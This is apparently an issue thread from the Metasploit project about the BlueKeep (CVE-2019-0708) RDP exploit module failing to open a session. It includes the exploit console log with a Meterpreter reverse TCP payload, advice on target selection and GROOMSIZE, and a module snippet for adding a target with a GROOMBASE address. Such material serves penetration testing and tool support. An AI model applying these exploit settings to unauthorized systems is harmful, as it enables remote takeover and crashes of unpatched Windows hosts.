CVE-2019-0708 BlueKEEP - Exploit completed, but no session was created

[ar5hil]

I Don't Understand what i did Wrong

My Setup

payload => windows/x64/meterpreter/reverse_tcp
**target => 1

Current behavior

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[] Started reverse TCP handler on 198.168.0.23:4444
[] 172.20.0.71:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 172.20.0.71:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[] 172.20.0.71:3389 - Scanned 1 of 1 hosts (100% complete)
[] 172.20.0.71:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8013200000, Channel count 1.
[!] 172.20.0.71:3389 - <---------------- | Entering Danger Zone | ---------------->
[] 172.20.0.71:3389 - Surfing channels ...
[] 172.20.0.71:3389 - Lobbing eggs ...
[] 172.20.0.71:3389 - Forcing the USE of FREE'd object ...
[!] 172.20.0.71:3389 - <---------------- | Leaving Danger Zone | ---------------->
[] Exploit completed, but no session was created.

System stuff

Metasploit version

Framework: 5.0.94-dev-1cb57a7e79affb4c4dc48f03a2fd39659bb83bbb
Console : 5.0.94-dev-1cb57a7e79affb4c4dc48f03a2fd39659bb83bbb

I installed Metasploit with:

metasploit-framework.msi
Already installed on Kali

OS

Running on Windows
Also on Kali (Same response)

[bcoles]

You will need to set the correct target and may need to set the appropriate groom base and groom size.

The Bluekeep module is also not 100% reliable.

This may also be useful:

https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/

[ar5hil]

How to set groom base and size

[bcoles]

How to set groom base and size

GROOMBASE can be set as a module option:

set GROOMSIZE <size>

The GROOMBASE is hard coded for each target. The following targets are available:

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic targeting via fingerprinting
   1   Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
   2   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
   3   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
   4   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
   5   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
   6   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.5)
   7   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
   8   Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)

If a target does not exist for the target system, you will need to add one to the module code. This guide may be useful in adding a target:

• https://pentest-tools.com/blog/bluekeep-exploit-metasploit/

Example:

            [
              'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
              {
                'Platform' => 'win',
                'Arch' => [ARCH_X64],
                'GROOMBASE' => 0xfffffa8003800000,
                'GROOMSIZE' => 100
              }
            ],

[justlife4x4]

Well in a machine i tried to exploit the 250MB groomsize was default but the machine kept crashing as im on 20-34 MB so i set the GROOMSIZE to 20MB but then it says exploit failed..

[bcoles]

The BlueKeep module requires the correct groombase and groomsize. The module contains several targets with the appropriate groombase and groomsize. These targets have been field tested, but the module is not 100% reliable.

Refer to the following guides for information related to configuration and adding new targets:

• https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/
• https://pentest-tools.com/blog/bluekeep-exploit-metasploit/

Closing this issue.